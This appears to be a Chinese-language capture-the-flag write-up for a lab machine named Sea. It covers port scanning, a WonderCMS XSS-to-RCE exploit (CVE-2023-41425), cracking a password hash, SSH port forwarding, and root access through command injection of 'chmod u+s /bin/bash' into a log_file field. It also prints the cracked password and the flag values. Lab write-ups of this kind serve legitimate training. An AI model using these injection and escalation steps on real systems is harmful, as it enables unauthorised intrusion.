信息收集
IP Address | Opening Ports |
---|---|
10.10.11.28 | TCP:22,80 |
$ nmap -p- 10.10.11.28 --min-rate 1000 -sC -sV
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Wonder-CMS && XSS-RCE
data:image/s3,"s3://crabby-images/6d227/6d2274e6615ea83245836fe2d5c6b26967c495cf" alt=""
$ feroxbuster --url http://10.10.11.28/
data:image/s3,"s3://crabby-images/1311d/1311de311efafba5382a5422ac10759923f1518b" alt=""
data:image/s3,"s3://crabby-images/c04fc/c04fc38ba776b92607653aa6cdcda651e17e9866" alt=""
https://github.com/prodigiousMind/CVE-2023-41425
http://10.10.11.28/contact.php
data:image/s3,"s3://crabby-images/84bd3/84bd317bbb683a4a7ec55e837e6e7a661b53d695" alt=""
复制xss载荷到字段website发送
data:image/s3,"s3://crabby-images/1ac5b/1ac5b158a7184e1428b79643173057ea37c9e86a" alt=""
获取反向shell后在/var/www/sea/data/database.js 存在hash
data:image/s3,"s3://crabby-images/5908f/5908f9c4d92e68574cd399b17e88d784fcf0f094" alt=""
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
john破解后密码是:mychemicalromance
User.txt
5b1f824a93b0ea7e012b0a84fdbac2cc
权限提升 - System Monitor 命令注入
amay@sea:~$ netstat -lnput
data:image/s3,"s3://crabby-images/a56ea/a56eadc2e4a9ebe3efee8737923657ec3666073d" alt=""
$ ssh -L 8888:127.0.0.1:8080 amay@10.10.11.28
http://127.0.0.1:8888
输入amay账户密码后进入
data:image/s3,"s3://crabby-images/36fcd/36fcd655dabc4af243f1ef0b9caa4030ad0d3e99" alt=""
把命令chmod u+s /bin/bash
进行url编码并且对字段log_file命令注入
data:image/s3,"s3://crabby-images/5da83/5da8345a2cd00eb8a2e282fad2bed598d564f20b" alt=""
amay@sea:~$ /bin/bash -p
提升至root权限特权模式
data:image/s3,"s3://crabby-images/84f72/84f72b76f5409db7df12180ec2e5db2897f65ab1" alt=""
Root.txt
4c0c7c21e39e202983ecab6d8c15f493